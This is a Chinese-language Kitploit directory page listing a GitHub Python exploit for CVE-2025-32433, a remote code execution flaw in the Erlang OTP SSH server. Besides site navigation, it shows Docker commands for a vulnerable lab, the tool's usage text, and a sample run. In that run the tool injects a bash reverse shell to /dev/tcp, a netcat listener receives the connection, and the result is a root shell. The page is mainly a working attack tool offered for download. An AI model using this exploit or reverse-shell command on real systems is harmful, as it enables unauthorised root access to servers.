Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-32433 — 针对 Erlang OTP SSH 服务器的 CVE-2025-32433 Python 利用程序,通过精心构造的 SSH 通道请求提供远程代码执行和反向 Shell 访问。 | Kitploit
工具/GitHubGitHub/0xpthree/cve-2025-32433
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHub0xpthree/cve-2025-32433

cve-2025-32433

针对 Erlang OTP SSH 服务器的 CVE-2025-32433 Python 利用程序,通过精心构造的 SSH 通道请求提供远程代码执行和反向 Shell 访问。

查看仓库
611年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

构建

root@kitploit:~
» git clone https://github.com/0xPThree/cve-2025-32433.git && cd cve-2025-32433
» docker build -t erlang-ssh .
» docker run -d --name erlang-ssh -p 2222:2222 erlang-ssh

POC

root@kitploit:~
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -h
用法: cve-2025-32433.py [-h] [-d] [--host HOST] [--port PORT]

针对CVE-2025-32433 (Erlang OTP SSH服务器)的利用工具。

选项:
  -h, --help           显示此帮助信息并退出
  -d, --debug          以十六进制格式打印原始响应
  -t, --target TARGET  目标主机 (默认: 127.0.0.1)
  -p, --port PORT      目标端口 (默认: 2222)
  
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] 正在连接到SSH服务器...
[✓] 标识: SSH-2.0-Erlang/5.1.4.7
[*] 正在发送KEXINIT...
[*] 正在打开通道...
[?] Shell命令: bash -i >& /dev/tcp/172.17.0.1/4488 0>&1
[*] 正在发送CHANNEL_REQUEST...
[✓] 载荷已发送。
root@kitploit:~
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » nc -lvnp 4488
正在监听 [any] 4488 ...
收到来自 (UNKNOWN) [172.17.0.2] 58338 连接到 [172.17.0.1] 的连接

root@cf0f300797ea:~# id && hostname
uid=0(root) gid=0(root) groups=0(root)
cf0f300797ea

附加信息

https://0xpthree.gitbook.io/notes/exploits-pocs/erlang/otp-ssh-cve-2025-32433

下载工具